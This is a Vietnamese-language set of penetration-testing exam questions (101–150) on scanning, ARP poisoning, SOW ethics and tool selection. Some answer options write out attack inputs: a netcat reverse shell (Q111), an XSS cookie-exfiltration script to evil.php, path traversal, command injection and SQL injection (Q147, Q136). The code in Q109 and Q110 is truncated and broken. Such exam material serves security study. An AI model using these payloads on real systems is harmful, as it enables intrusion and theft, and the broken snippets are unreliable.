Câu 101:
Một chuyên gia kiểm tra thâm nhập nhận được kết quả sau từ quét Nmap:
Các cổng thú vị trên 192.168.1.1:
Cổng | Trạng thái | Dịch vụ |
21/tcp | Đóng | ftp |
22/tcp | Mở | ssh |
23/tcp | Đóng | telnet |
25/tcp | Đóng | smtp |
80/tcp | Mở | http |
110/tcp | Đóng | pop3 |
139/tcp | Đóng | netbios-ssn |
443/tcp | Đóng | https |
3389/tcp | Đóng | rdp |
Hệ điều hành nào sau đây có KHẢ NĂNG CAO NHẤT đang chạy trên thiết bị đích?
A. CentOS
B. Arch Linux
C. Windows Server
D. Ubuntu
Câu 102:
Một chuyên gia kiểm tra thâm nhập muốn lấy thông tin đăng nhập FTP bằng cách triển khai một máy trạm như một cuộc tấn công on-path giữa thiết bị đích và máy chủ có giao thức FTP. Phương pháp nào sau đây là TỐT NHẤT để đạt được mục tiêu này?
A. Chờ lần đăng nhập tiếp theo và thực hiện tấn công hạ cấp trên máy chủ.
B. Chụp lưu lượng truy cập bằng Wireshark.
C. Thực hiện tấn công brute-force trên máy chủ.
D. Sử dụng lỗ hổng khai thác FTP chống lại máy chủ.
Câu 103:
Việc nối các giá trị chuỗi vào một chuỗi khác được gọi là:
A. biên dịch (compilation)
B. kết nối (connection)
C. nối chuỗi (concatenation)
D. liên từ (conjunction)
Câu 104:
Một chuyên gia tư vấn đang xem xét đầu ra sau đây sau khi có báo cáo về sự cố kết nối không liên tục:
? (192.168.1.1) tại 0a:d1:fa:b1:01:67 trên en0 ifscope [ethernet]
? (192.168.1.12) tại 34:a4:be:09:44:f4 trên en0 ifscope [ethernet]
? (192.168.1.17) tại 92:60:29:12:ac:d2 trên en0 ifscope [ethernet]
? (192.168.1.34) tại 88:de:a9:12:0e:fb trên en0 ifscope [ethernet]
? (192.168.1.136) tại 0a:d1:fa:b1:01:67 trên en0 ifscope [ethernet]
? (224.0.0.251) tại 01:02:5e:7f:ff:fa trên en0 ifscope permanent [ethernet]
? (239.255.255.250) tại ff:ff:ff:ff:ff:ff trên en0 ifscope permanent [ethernet]
Điều nào sau đây có KHẢ NĂNG CAO NHẤT được chuyên gia tư vấn báo cáo?
A. Một thiết bị trên mạng có địa chỉ IP trong subnet sai.
B. Một phiên multicast được khởi tạo bằng cách sử dụng nhóm multicast sai.
C. Một cuộc tấn công ARP flooding đang sử dụng địa chỉ broadcast để thực hiện DDoS.
D. Một thiết bị trên mạng đã đầu độc bộ đệm ARP.
Câu 105:
Rủi ro bảo mật ứng dụng web nào sau đây là một phần của OWASP Top 10 v2017? (Chọn hai)
A. Tràn bộ đệm
B. Kịch bản chéo trang
C. Tấn công điều kiện cuộc đua
D. Tấn công zero-day
E. Lỗ hổng tiêm
F. Tấn công ransomware
Câu 106:
Kết quả quét Nmap như sau:
Bắt đầu Nmap 7.80 (https://nmap.org) lúc 2021-01-24 01:10 EST
Báo cáo quét Nmap cho (192.168.1.1)
Máy chủ đang hoạt động (độ trễ 0,0035 giây).
Không hiển thị: 996 cổng đã lọc
| Cổng | Trạng thái | Dịch vụ | Phiên bản |
|—|—|—|—|
| 22/tcp | Mở | ssh | OpenSSH 6.6.1p1 |
| 53/tcp | Mở | domain | dnsmasq 2.72 |
| 80/tcp | Mở | http | lighttpd |
| 443/tcp | Mở | ssl/http | httpd |
Thông tin dịch vụ: Hệ điều hành: Linux; Thiết bị: router; CPE: cpe:/o:linux:linux_kernel
Phát hiện dịch vụ đã được thực hiện. Vui lòng báo cáo bất kỳ kết quả không chính xác nào tại https://nmap.org/submit/.
Nmap đã hoàn thành: 1 địa chỉ IP (1 máy chủ đang hoạt động) được quét trong 18,45 giây
Kết luận nào sau đây là TỐT NHẤT về thiết bị này?
A. Thiết bị này có thể dễ bị tấn công Heartbleed do cách các giao dịch qua TCP/22 xử lý các gói mở rộng heartbeat, cho phép kẻ tấn công lấy thông tin nhạy cảm từ bộ nhớ xử lý.
B. Thiết bị này rất có thể là một cổng với các dịch vụ quản lý trong băng tần.
C. Thiết bị này rất có thể là một máy chủ proxy chuyển tiếp các yêu cầu qua TCP/443.
D. Thiết bị này có thể dễ bị tấn công thực thi mã từ xa do lỗ hổng tràn bộ đệm trong phương thức được sử dụng để trích xuất tên DNS từ các gói trước khi xác thực DNSSEC.
Câu 107:
Khi chuẩn bị cho một cuộc đánh giá với một tổ chức doanh nghiệp, điều nào sau đây là một trong những điều QUAN TRỌNG NHẤT cần phát triển đầy đủ trước khi bắt đầu các hoạt động kiểm tra thâm nhập?
A. Làm rõ tuyên bố công việc
B. Lấy danh mục tài sản từ khách hàng
C. Phỏng vấn tất cả các bên liên quan
D. Xác định tất cả các bên thứ ba liên quan.
Câu 108:
Một chuyên gia kiểm tra thâm nhập đang xem xét SOW sau đây trước khi tham gia với khách hàng.
“Sơ đồ mạng, danh mục tài sản logic và vật lý, và tên của nhân viên sẽ được coi là bí mật của khách hàng. Sau khi hoàn thành đánh giá, chuyên gia kiểm tra thâm nhập sẽ gửi kết quả cho Giám đốc An ninh Thông tin (CISO) của khách hàng thông qua các giao thức được mã hóa và sau đó xử lý tất cả các kết quả bằng cách xóa chúng một cách an toàn.”
Dựa trên thông tin trong SOW, hành vi nào sau đây sẽ bị coi là phi đạo đức? (Chọn hai)
A. Sử dụng các công cụ kiểm tra thâm nhập độc quyền không có sẵn cho công chúng hoặc cho khách hàng để kiểm toán và kiểm tra
B. Sử dụng mật mã khóa công khai để đảm bảo kết quả được gửi đến CISO sau khi hoàn thành đánh giá.
C. Không chia sẻ với khách hàng các lỗ hổng nghiêm trọng tồn tại trong kiến trúc của khách hàng để làm hài lòng nhóm lãnh đạo cấp cao của khách hàng.
D. Tìm kiếm sự giúp đỡ với đánh giá trong các diễn đàn tin tặc ngầm bằng cách chia sẻ địa chỉ IP công khai của khách hàng
E. Sử dụng công cụ xóa dựa trên phần mềm để xóa kết quả của khách hàng khỏi máy tính xách tay của chuyên gia kiểm tra thâm nhập.
F. Giữ lại SOW trong công ty của chuyên gia kiểm tra thâm nhập để sử dụng trong tương lai để nhóm bán hàng có thể lập kế hoạch cho các đánh giá trong tương lai
Câu 109:
Một chuyên gia kiểm tra thâm nhập đã tải xuống tập lệnh Perl sau đây có thể được sử dụng để xác định các lỗ hổng trong bộ chuyển mạch mạng. Tuy nhiên, tập lệnh không hoạt động bình thường.
- #!/usr/bin/perl
- $ip=argv[1];
- if ($hostname eq “switchtest”) {
- attack ($ip);
- }
- else { exit 0; }
- sub attack {
Chuyên gia kiểm tra nên áp dụng những thay đổi nào sau đây để tập lệnh hoạt động như dự kiến?
A. Thay đổi dòng 2 thành $ip= ‘10.192.168.254’;
B. Xóa dòng 3, 5 và 6.
C. Xóa dòng 6.
D. Di chuyển tất cả các dòng bên dưới dòng 7 lên đầu tập lệnh.
Câu 110:
Một chuyên gia kiểm tra thâm nhập tìm thấy một tập lệnh PHP được sử dụng bởi một ứng dụng web trong kho lưu trữ mã nguồn nội bộ không được bảo vệ. Sau khi xem xét mã, chuyên gia kiểm tra xác định điều sau:
if(isset(
_POST[‘item’]);
}
Sự kết hợp nào sau đây của các công cụ mà chuyên gia kiểm tra thâm nhập sẽ sử dụng để khai thác tập lệnh này?
A. Hydra và crunch
B. Netcat và cURL
C. Burp Suite và DIRB
D. Nmap và OWASP ZAP
Câu 111:
Một chuyên gia kiểm tra thâm nhập đã có quyền truy cập root vào máy chủ tệp dựa trên Linux và muốn duy trì quyền truy cập sau khi khởi động lại. Kỹ thuật nào sau đây sẽ hỗ trợ TỐT NHẤT mục tiêu này?
A. Tạo dịch vụ hệ thống một lần để thiết lập shell ngược
B. Lấy /etc/shadow và brute force mật khẩu root.
C. Chạy lệnh nc -e /bin/sh < /dev/tcp/10.10.14.2/4444 0>&1.
D. Di chuyển ngang để tạo tài khoản người dùng trên LDAP
Câu 112:
Một chuyên gia kiểm tra thâm nhập đang tiến hành kiểm tra thâm nhập. Chuyên gia kiểm tra có được shell cấp root trên máy chủ Linux và phát hiện dữ liệu sau trong tệp có tên password.txt trong thư mục /home/svsacct:
U3VQZXIkM2NyZXQhCg==
Chuyên gia kiểm tra nên sử dụng lệnh nào sau đây TIẾP THEO để giải mã nội dung của tệp?
A. echo U3VQZXIkM2NyZXQhCg== | base64 -d
B. tar zxvf password.txt
C. hydra -l svsacct -p U3VQZXIkM2NyZXQhCg== ssh://192.168.1.0/24
D. john –wordlist /usr/share/seclists/rockyou.txt password.txt
Câu 113:
Một công ty đã tuyển dụng một chuyên gia kiểm tra thâm nhập để thực hiện quét lỗ hổng trên mạng. Xác nhận kiểm tra được thực hiện trên môi trường đã biết. Lựa chọn nào sau đây là TỐT NHẤT để xác định hệ thống đúng cách trước khi thực hiện đánh giá?
A. Kiểm kê tài sản
B. Bản ghi DNS
C. Quét ứng dụng web
D. Quét toàn bộ
Câu 114:
Một công ty bảo mật đã được thuê để thực hiện kiểm tra thâm nhập bên ngoài đối với một công ty. Thông tin duy nhất mà công ty nhận được là tên công ty. Phương pháp trinh sát thụ động nào sau đây có KHẢ NĂNG CAO NHẤT mang lại kết quả ban đầu tích cực?
A. Tạo và triển khai email lừa đảo cho các nhà lãnh đạo chủ chốt của công ty.
B. Chạy quét lỗ hổng trên trang web bên ngoài của công ty.
C. Chạy chuỗi cung ứng/nhà cung cấp của công ty.
D. Cạo thông tin từ web và các trang mạng xã hội.
Câu 115:
Một công ty bảo mật đang thảo luận về kết quả kiểm tra thâm nhập với khách hàng. Dựa trên các phát hiện, khách hàng muốn tập trung thời gian còn lại vào một phân đoạn mạng quan trọng. Điều nào sau đây TỐT NHẤT mô tả hành động đang diễn ra?
A. Tối đa hóa khả năng tìm thấy lỗ hổng
B. Ưu tiên lại các mục tiêu/mục đích
C. Loại bỏ khả năng dương tính giả
D. Giảm thiểu rủi ro cho môi trường của khách hàng
Câu 116:
Công cụ nào sau đây phù hợp NHẤT để thực hiện đánh giá bảo mật ứng dụng web thủ công? (Chọn hai)
A. OWASP ZAP
B. Nmap
C. Nessus
D. BeEF
E. Hydra
F. Burp Suite
Câu 117:
Chạy trình quét lỗ hổng trên một phân đoạn mạng hybrid bao gồm các máy chủ CNTT thông thường và hệ thống điều khiển công nghiệp:
A. sẽ tiết lộ lỗ hổng trong giao thức Modbus
B. có thể gây ra lỗi ngoài ý muốn trong hệ thống điều khiển
C. có thể làm giảm tỷ lệ dương tính thực sự của các phát hiện
D. sẽ tạo ra tình trạng từ chối dịch vụ trên mạng IP
Câu 118:
Điều nào sau đây cung cấp ma trận chiến thuật và kỹ thuật phổ biến được sử dụng bởi kẻ tấn công cùng với các biện pháp giảm thiểu được đề xuất?
A. NIST SP 800-53
B. OWASP Top 10
C. Khung MITRE ATT&CK
D. Hướng dẫn kỹ thuật PTES
Câu 119:
Một kỹ sư bảo mật đã xác định một máy chủ mới trên mạng và muốn quét máy chủ để xác định xem nó có đang chạy phiên bản Linux được phê duyệt và phiên bản Apache được vá hay không. Lệnh nào sau đây sẽ hoàn thành nhiệm vụ này?
A. nmap -f -sV -p80 192.168.1.20
B. nmap -sL -p80 192.168.1.20
C. nmap -A -T4 -p80 192.168.1.20
D. nmap -v -p80 192.168.1.20
Câu 120:
Một công ty dịch vụ thư đã thuê một chuyên gia kiểm tra thâm nhập để thực hiện liệt kê tất cả tài khoản người dùng trên máy chủ SMTP để xác định xem tài khoản của nhân viên cũ có còn hoạt động hay không. Nên sử dụng lệnh nào sau đây để đạt được mục tiêu?
A. VRFY và EXPN
B. VRFY và TURN
C. EXPN và TURN
D. RCPT TO và VRFY
Câu 121:
Một chuyên gia kiểm tra thâm nhập đang đánh giá vành đai mạng của công ty. Chuyên gia kiểm tra đã nhận được thông tin hạn chế về các biện pháp kiểm soát phòng thủ hoặc đối phó, và kiến thức hạn chế về kiểm tra nội bộ tồn tại. Bước nào sau đây nên là BƯỚC ĐẦU TIÊN để lên kế hoạch cho các hoạt động trinh sát?
A. Khởi chạy quét bên ngoài các khối mạng.
B. Kiểm tra các bản ghi WHOIS và khối mạng của công ty.
C. Sử dụng tra cứu DNS và dig để xác định máy chủ bên ngoài.
D. Thực hiện quét ping các khối mạng của công ty.
Câu 122:
Một chuyên gia kiểm tra thâm nhập đã chụp được lưu lượng truy cập sau trong quá trình kiểm tra ứng dụng web:
GET http://172.16.0.10:3000/zest/basket/2 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Authorization: Bearer <Mã thông báo dài được mã hóa>
Chuyên gia kiểm tra nên sử dụng phương pháp nào sau đây để hình dung thông tin ủy quyền đang được truyền?
A. Giải mã tiêu đề ủy quyền bằng UTF-8.
B. Giải mã tiêu đề ủy quyền bằng bcrypt.
C. Giải mã tiêu đề ủy quyền bằng Base64.
D. Giải mã tiêu đề ủy quyền bằng AES.
Câu 123:
Một chuyên gia kiểm tra thâm nhập được thuê để thực hiện đánh giá bảo mật vật lý cho văn phòng của một tổ chức. Sau khi theo dõi môi trường trong vài giờ, chuyên gia kiểm tra thâm nhập nhận thấy một số nhân viên đi ăn trưa ở một nhà hàng gần đó và để đồ đạc không có người trông coi trên bàn trong khi lấy đồ ăn. Kỹ thuật nào sau đây có KHẢ NĂNG CAO NHẤT được sử dụng để có được quyền truy cập hợp pháp vào tòa nhà của tổ chức mà không gây ra quá nhiều cảnh báo?
A. Đi theo
B. Đào thùng rác
C. Nhìn trộm
D. Sao chép thẻ
Câu 124:
Một chuyên gia kiểm tra thâm nhập muốn tìm thông tin ẩn trong các tài liệu có sẵn trên web tại một tên miền cụ thể. Chuyên gia kiểm tra thâm nhập nên sử dụng công cụ nào sau đây?
A. Netcraft
B. CentralOps
C. Responder
D. FOCA
Câu 125:
Một chuyên gia kiểm tra thâm nhập đã truy cập vào email nội bộ, công ty của Giám đốc điều hành (CEO). Mục tiêu tiếp theo là truy cập vào mạng. Phương pháp nào sau đây có KHẢ NĂNG CAO NHẤT sẽ hoạt động?
A. Cố gắng lấy khóa riêng được sử dụng cho S/MIME từ tài khoản của CEO.
B. Gửi email từ tài khoản của CEO, yêu cầu tài khoản mới.
C. Di chuyển ngang từ máy chủ thư đến bộ điều khiển tên miền.
D. Cố gắng leo thang đặc quyền trên máy chủ thư để có quyền truy cập root.
Câu 126:
Một chuyên gia kiểm tra thâm nhập cần thực hiện quét lỗ hổng trên máy chủ web. Công cụ nào sau đây mà chuyên gia kiểm tra có KHẢ NĂNG CAO NHẤT sẽ chọn?
A. Nmap
B. Nikto
C. Cain và Abel
D. Ethercap
Câu 127:
Một công ty đã thuê một chuyên gia kiểm tra thâm nhập để triển khai và thiết lập một điểm truy cập giả mạo trên mạng. Công cụ nào sau đây là công cụ TỐT NHẤT để sử dụng để đạt được mục tiêu này?
A. Wireshark
B. Aircrack-ng
C. Kismet
D. Wifite
Câu 128:
Một chuyên gia kiểm tra thâm nhập đã được giao nhiệm vụ tấn công một loạt mục tiêu trong phạm vi 192.168.1.0/24, kích hoạt càng ít báo động và biện pháp đối phó càng tốt. Cú pháp quét Nmap nào sau đây sẽ đạt được mục tiêu này TỐT NHẤT?
A. nmap -sT -vvv -O 192.168.1.0/24 -PO
B. nmap -sV 192.168.1.0/24 -PO
C. nmap -sA -v -O 192.168.1.0/24
D. nmap -sS -O 192.168.1.0/24 -T1
Câu 129:
Một chuyên gia kiểm tra thâm nhập đang kiểm tra phiên bản mới của ứng dụng di động trong môi trường sandbox. Để chặn và giải mã lưu lượng truy cập giữa ứng dụng và API bên ngoài, chuyên gia kiểm tra đã tạo CA root riêng và cấp chứng chỉ từ đó. Mặc dù chuyên gia kiểm tra đã cài đặt CA root vào kho tin cậy của điện thoại thông minh được sử dụng cho các bài kiểm tra, ứng dụng hiển thị lỗi cho biết chứng chỉ không khớp và không kết nối với máy chủ. Nguyên nhân nào sau đây có KHẢ NĂNG CAO NHẤT gây ra lỗi?
A. Cổng TCP 443 không mở trên tường lửa
B. Máy chủ API đang sử dụng SSL thay vì TLS
C. Chuyên gia kiểm tra đang sử dụng phiên bản ứng dụng cũ
D. Ứng dụng đã ghim chứng chỉ API.
Câu 130:
Một công ty phần mềm đã thuê một chuyên gia kiểm tra thâm nhập để thực hiện kiểm tra thâm nhập trên máy chủ cơ sở dữ liệu. Chuyên gia kiểm tra đã được cung cấp nhiều công cụ được sử dụng theo chính sách bảo mật của công ty. Công cụ nào sau đây là TỐT NHẤT để sử dụng để tìm lỗ hổng trên máy chủ này?
A. OpenVAS
B. Nikto
C. SQLmap
D. Nessus
Câu 131:
Một công ty lo ngại rằng nhà cung cấp dịch vụ đám mây của mình không bảo vệ đầy đủ các máy ảo chứa phần mềm phát triển của mình. Các máy ảo được đặt trong một trung tâm dữ liệu, với các công ty khác chia sẻ tài nguyên vật lý. Loại tấn công nào sau đây là QUAN TRỌNG NHẤT đối với công ty?
A. Tấn công tràn dữ liệu
B. Tấn công cướp phiên
C. Tấn công chiếm dụng tên miền
D. Tấn công kênh bên
Câu 132:
Khái niệm nào sau đây xác định tập hợp các bước và phương pháp cụ thể được thực hiện trong quá trình kiểm tra thâm nhập?
A. Chi tiết phạm vi
B. Phát hiện
C. Phương pháp
D. Tuyên bố công việc
Câu 133:
Một công ty điều tra tư nhân đang yêu cầu kiểm tra thâm nhập để xác định khả năng kẻ tấn công có thể truy cập vào thiết bị di động và sau đó lấy cắp dữ liệu từ các thiết bị đó. Phương pháp tấn công phi kỹ thuật nào sau đây, nếu thành công, có KHẢ NĂNG CAO NHẤT cho phép cả hai mục tiêu?
A. Gửi SMS với số dịch vụ giả mạo bao gồm liên kết để tải xuống ứng dụng độc hại.
B. Khai thác lỗ hổng trong MDM và tạo tài khoản và hồ sơ thiết bị mới.
C. Thực hiện vishing trên bộ phận trợ giúp CNTT để thu thập danh sách IMEI thiết bị được phê duyệt để giả mạo.
D. Lây nhiễm một trang web thường được nhân viên sử dụng bằng phần mềm độc hại nhắm mục tiêu vào kiến trúc x86.
Câu 134:
Một chuyên gia kiểm tra thâm nhập đã chạy lệnh ping “-A” trong quá trình kiểm tra môi trường không xác định và nó đã trả về một gói 128 TTL. Hệ điều hành nào sau đây có KHẢ NĂNG CAO NHẤT trả về một gói thuộc loại này?
A. Windows
B. Apple
C. Linux
D. Android
Câu 135:
Một chuyên gia kiểm tra thâm nhập vật lý cần vào bên trong văn phòng của một tổ chức và thu thập thông tin nhạy cảm mà không hành động đáng ngờ hoặc bị nhân viên bảo vệ chú ý. Chuyên gia kiểm tra đã quan sát thấy rằng cổng soát vé của công ty không quét thẻ và nhân viên để thẻ trên bàn khi đi vệ sinh. Kỹ thuật nào sau đây mà chuyên gia kiểm tra có thể sử dụng để có được quyền truy cập vật lý vào văn phòng? (Chọn hai)
A. Nhìn trộm
B. Giả mạo cuộc gọi
C. Ăn cắp thẻ
D. Đi theo
E. Đào thùng rác
F. Lừa đảo qua email
Câu 136:
Một chuyên gia kiểm tra thâm nhập đã tiến hành đánh giá trên máy chủ web. Nhật ký từ phiên này hiển thị như sau:
http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892‘; DROP TABLE SERVICES;
Cuộc tấn công nào sau đây đang được thử?
A. Clickjacking
B. Cướp phiên
C. Ô nhiễm tham số
D. Cướp cookie
E. Kịch bản chéo trang
Câu 137:
Một công ty bảo mật mới đang tiếp nhận khách hàng đầu tiên của mình. Khách hàng chỉ cho phép kiểm tra vào cuối tuần và cần kết quả vào sáng thứ Hai. Tuy nhiên, nhóm đánh giá không thể truy cập môi trường như mong đợi cho đến thứ Hai. Công ty bảo mật nên có được điều nào sau đây TRƯỚC KHI bắt đầu đánh giá?
A. Tuyên bố công việc đã ký
B. Tài khoản người dùng chính xác và mật khẩu liên quan
C. Khung thời gian dự kiến của đánh giá
D. Liên hệ khẩn cấp thích hợp cho khách hàng
Câu 138:
Kết quả quét Nmap của bộ chuyển mạch mạng cho thấy như sau:
Báo cáo quét Nmap cho 192.168.1.254
Máy chủ đang hoạt động (độ trễ 0,014 giây).
Không hiển thị: 96 cổng đóng
| Cổng | Trạng thái | Dịch vụ |
|—|—|—|
| 22/tcp | Mở | ssh |
| 23/tcp | Mở | telnet |
| 80/tcp | Mở | http |
| 443/tcp | Mở | https |
Kiểm soát kỹ thuật nào sau đây có KHẢ NĂNG CAO NHẤT sẽ là đề xuất ĐẦU TIÊN cho thiết bị này?
A. Mật khẩu được mã hóa
B. Kỹ thuật gia cố hệ thống
C. Xác thực đa yếu tố
D. Phân đoạn mạng
Câu 139:
Một chuyên gia kiểm tra thâm nhập đã truy cập shell vào máy chủ Windows và muốn chạy tệp nhị phân được tạo đặc biệt để thực thi sau bằng hàm wmic.exe process call create. Cơ chế hệ thống tệp hoặc hệ điều hành nào sau đây có KHẢ NĂNG CAO NHẤT hỗ trợ mục tiêu này?
A. Luồng dữ liệu thay thế
B. Mô-đun PowerShell
C. Ẩn giấu MP4
D. ProcMon
Câu 140:
Một chuyên gia kiểm tra thâm nhập, người đang thực hiện đánh giá, phát hiện ra một quản trị viên đã và đang đánh cắp thông tin độc quyền của công ty. Quản trị viên đề nghị trả tiền cho chuyên gia kiểm tra để giữ im lặng. Hành động nào sau đây là TỐT NHẤT mà chuyên gia kiểm tra nên thực hiện?
A. Kiểm tra tài liệu phạm vi để xác định xem việc đánh cắp có nằm trong phạm vi hay không.
B. Dừng kiểm tra thâm nhập.
C. Leo thang vấn đề.
D. Bao gồm phát hiện và tương tác trong báo cáo hàng ngày.
Câu 141:
Giám đốc An ninh Thông tin muốn đánh giá bảo mật ứng dụng thương mại điện tử của công ty. Công cụ nào sau đây mà chuyên gia kiểm tra thâm nhập nên sử dụng ĐẦU TIÊN để lấy thông tin liên quan từ ứng dụng mà không kích hoạt báo động?
A. SQLmap
B. DirBuster
C. w3af
D. OWASP ZAP
Câu 142:
Tài liệu nào sau đây phải được ký giữa chuyên gia kiểm tra thâm nhập và khách hàng để quản lý cách quản lý bất kỳ thông tin được cung cấp nào trước, trong và sau khi đánh giá?
A. MSA
B. NDA
C. SOW
D. ROE
Câu 143:
Một chuyên gia kiểm tra thâm nhập chạy quét trên máy chủ và có được kết quả sau:
21/tcp open ftp Microsoft ftpd
| ftp-anon: Cho phép đăng nhập FTP ẩn danh (Mã FTP 230)
| 03-12-20 09:23AM 331 index.aspx
| ftp-syst:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2012 Std
3389/tcp open ssl/ms-wbt-server
| rdp-ntlm-info:
| Target_Name: WEB3
| NetBIOS_Computer_Name: WEB3
| Product_Version: 6.3.9600
|_ System_Time: 2021-01-15T11:32:06+00:00
8443/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Phương thức có thể rủi ro: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
Chuỗi lệnh nào sau đây mà chuyên gia kiểm tra thâm nhập nên thử TIẾP THEO?
A. ftp 192.168.53.23
B. smbclient \\WEB3\IPC$ -I 192.168.53.23 -U guest
C. ncrack -u Administrator -P 15worst_passwords.txt -p rdp 192.168.53.23
D. curl -X TRACE https://192.168.53.23:8443/index.aspx
Câu 144:
Một chuyên gia kiểm tra thâm nhập cần tải kết quả quét cổng lên công cụ bảo mật tập trung. Lệnh nào sau đây sẽ cho phép chuyên gia kiểm tra lưu kết quả ở định dạng có thể hoán đổi?
A. nmap -iL results 192.168.0.10-100
B. nmap 192.168.0.10-100 -O > results
C. nmap -A 192.168.0.10-100 -oX results
D. nmap 192.168.0.10-100 | grep “results”
Câu 145:
Trong quá trình đánh giá kiểm tra thâm nhập, một chuyên gia tư vấn thực hiện trinh sát khách hàng để xác định các mục tiêu tiềm năng cho chiến dịch lừa đảo. Điều nào sau đây sẽ cho phép chuyên gia tư vấn truy xuất địa chỉ email cho các địa chỉ liên hệ kỹ thuật và thanh toán một cách nhanh chóng, mà không kích hoạt bất kỳ công cụ an ninh mạng nào của khách hàng?
(Chọn hai)
A. Cạo thông tin từ các trang mạng xã hội
B. Sử dụng công cụ tra cứu WHOIS
C. Thu thập dữ liệu từ trang web của khách hàng
D. Lừa đảo nhân viên công ty
E. Sử dụng công cụ tra cứu DNS
F. Thực hiện wardriving gần cơ sở của khách hàng
Câu 146:
Trong quá trình kiểm tra thâm nhập, tên miền, phạm vi IP, máy chủ và ứng dụng được xác định trong:
A. SOW.
B. SLA.
C. ROE.
D. NDA
Câu 147:
Một chuyên gia kiểm tra đang thực hiện kiểm tra thâm nhập trên một trang web nhận được kết quả sau:
Cảnh báo: mysql_fetch_array() mong đợi tham số 1 là tài nguyên, boolean được đưa ra trong
/var/www/search.php trên dòng 62
Lệnh nào sau đây có thể được sử dụng để tấn công trang web tiếp theo?
A. <script>var adr = ‘../evil.php?test=’ + escape(document.cookie);</script>
B. ../../../../../../../../../../etc/passwd
C. /var/www/html/index.php;whoami
D. 1 UNION SELECT 1,DATABASE(),3
Câu 148:
Một chuyên gia kiểm tra thâm nhập đã thiết lập vị trí tấn công on-path giữa máy chủ đích và các dịch vụ mạng cục bộ nhưng chưa thể thiết lập vị trí tấn công on-path giữa máy chủ đích và Internet. Bất kể, chuyên gia kiểm tra muốn chuyển hướng tinh tế các kết nối HTTP đến IP máy chủ giả mạo. Phương pháp nào sau đây sẽ hỗ trợ TỐT NHẤT mục tiêu?
A. Truy cập vào máy chủ đích và cấy phần mềm độc hại được tạo đặc biệt cho mục đích này.
B. Khai thác máy chủ DNS cục bộ và thêm/cập nhật bản ghi vùng với bản ghi A giả mạo.
C. Sử dụng tiện ích Scapy để ghi đè các trường phân giải tên trong phản hồi truy vấn DNS.
D. Proxy các kết nối HTTP từ máy chủ đích đến máy chủ giả mạo.
Câu 149:
Loại thông tin nào sau đây có KHẢ NĂNG CAO NHẤT sẽ được bao gồm trong báo cáo đánh giá bảo mật ứng dụng gửi cho nhà phát triển? (Chọn hai)
A. Sử dụng các hàm sắp xếp không được tối ưu hóa
B. Vệ sinh đầu vào kém
C. Tham chiếu con trỏ null
D. Không tuân thủ hướng dẫn kiểu mã
E. Sử dụng thẻ Javadoc không dùng nữa
F. Điểm phức tạp cyclomatic là 3
Câu 150:
Một chuyên gia kiểm tra thâm nhập đã tìm thấy các dấu hiệu cho thấy mật khẩu của người dùng có đặc quyền có thể giống nhau trên 30 hệ thống Linux khác nhau. Công cụ nào sau đây có thể giúp chuyên gia kiểm tra xác định số lượng hệ thống mà mật khẩu có thể được sử dụng?
A. Hydra
B. John the Ripper
C. Cain và Abel
D. Medusa
Để lại một bình luận